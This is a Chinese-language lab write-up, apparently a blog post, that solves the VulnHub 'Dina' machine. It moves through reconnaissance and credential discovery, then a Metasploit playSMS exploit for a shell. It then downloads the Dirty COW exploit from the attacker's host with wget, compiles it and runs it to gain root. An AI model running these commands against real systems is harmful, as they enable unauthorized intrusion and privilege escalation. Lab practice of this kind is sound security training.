vulnhub-1:Dina

一、vulnhub简介

Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行。

每个镜像会有破解的目标,大多是Boot2root,从启动虚机到获取操作系统的root权限和查看flag。

vulnhub官网地址:Vulnerable By Design ~ VulnHub

由于未知原因,我的浏览器每次访问vulnhub官网都是页面混乱

二、Dina靶场环境配置

1、靶场环境下载

Dina靶场环境详情页面:Dina: 1.0.1 ~ VulnHub

页面往下翻,找到Download-->Download (Mirror)

 2、靶场文件导入

打开VMware,在主界面点击“打开虚拟机

 在打开界面,找到刚才下载好的ova格式虚拟机文件

在导入界面为虚拟机命名存储路径设置

 如果导入失败,点击重新导入

 

三、Dina靶场渗透

1、准备

kali-Linux*1、Dina*1

(两台虚拟机均为NAT模式或者均为桥接模式)

kali开启apache服务,并将脏牛提权源文件复制到apache的相关路径下:

重新打开一个root权限的terminal终端:

脏牛提权C语言源文件下载路径:GitHub - firefart/dirtycow: Dirty Cow exploit - CVE-2016-5195

脏牛提权的C语言源文件复制到/var/www/html/目录下:cp /home/kali/下载/dirty.c /var/www/html/dirty.c

切换路径apache服务相关的目录下:cd /var/www/html/

※赋权dirty.cchmod 777 dirty.c

※启动kali的apache服务:systemctl start apache

2、渗透目标

获取目标主机中的flag值(/root/flag.txt)

3、过程

(1)、信息收集

使用nmap进行操作系统版本探测扫描:nmap -O -sV 192.168.107.0/24

上图中的5个存活IP中,其中192.168.107.1是默认网关,192.168.107.2是某个虚拟机网络配置(如VMware-Tools),192.168.107.254是子网中的广播地址(有特殊用途),使用ifconfig命令查看kali的IP为192.168.107.151,由于192.168.107.150的操作系统为Ubuntu,很显然这个IP就是靶机了,而且还开放了80端口http服务

发现目标后,对目标主机的80端口http服务进行访问,结果如下图:

80端口可以正常访问web应用http服务

网站浏览了半天啥都没有发现,使用kali自带的网站目录扫描工具dirb进行扫描:dirb http://192.168.107.150/

发现了以上截图中的目录,逐个进行访问和源代码审计发现robots目录中有未扫描出来的目录 (nothing、angel、...),secure目录中有个backup的压缩文件,果断下载

robots目录中的目录进行逐一访问与源代码审计,发现其中的nothing目录并不是真的404 NOT FOUND

发现里面有一份密钥,果断保存

源代码审计完后,打开刚才发现的压缩文件,发现竟然加密了,用刚才发现的密钥逐一尝试,发现竟然有一个是对的:freedom!!!(事实上的我:第一次打靶场,竟然天真的用john破解的密码)

打开文件后,发现里面是一份mp3文件,发现正常的mp3打不开,只能使出万能的记事本了!!!

发现里面居然有一个目录、账户名,使用浏览器试试

意外之喜,有个web应用,那想必mp3文件里的name应该是username了,死马当活马医,使用刚才发现的密钥试试,amazing!!!(username:touhid;password:diana)

发现主界面挺简洁的(啥都没有!)

(2)、漏洞相关信息收集及利用

既然是playsms,那就使用MSF搜一下看看有没有什么漏洞吧(如果你很牛逼的话可以试试任意文件上传拿下shell

MSF启动:msfconsole

搜索可用漏洞模块:search playsms

使用第三个模块(编号为2):use 2

设置攻击参数:

set rhosts 192.168.107.150        #Dina IP(目标IP)

set targeturi /SecreTSMSgatwayLogin        #目标URL

set lhost 192.168.107.151        #kali IP(攻击者IP)

set username touhid        #目标IP的目标URL的登录用户名

set password diana        #目标IP的目标URL的登录密钥、口令

查看参数设置情况:show options

开始攻击:run

启动标准shell:python -c 'import pty; pty.spawn("/bin/bash")'
切换到靶机有权限的目录下:cd /tmp

wget下载脏牛提权文件:wget http://192.168.107.151/dirty.c

在靶机中编译脏牛提权C语言源文件gcc -pthread dirty.c -o dirty -lcrypt

运行脏牛提权脚本./dirty new-password

(3)、获取flag值

FLAG值:22d06624cd604a0626eb5a2992a6f2e6

至此,便结束了!

希望我的以上步骤可以为大家带来帮助! 

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值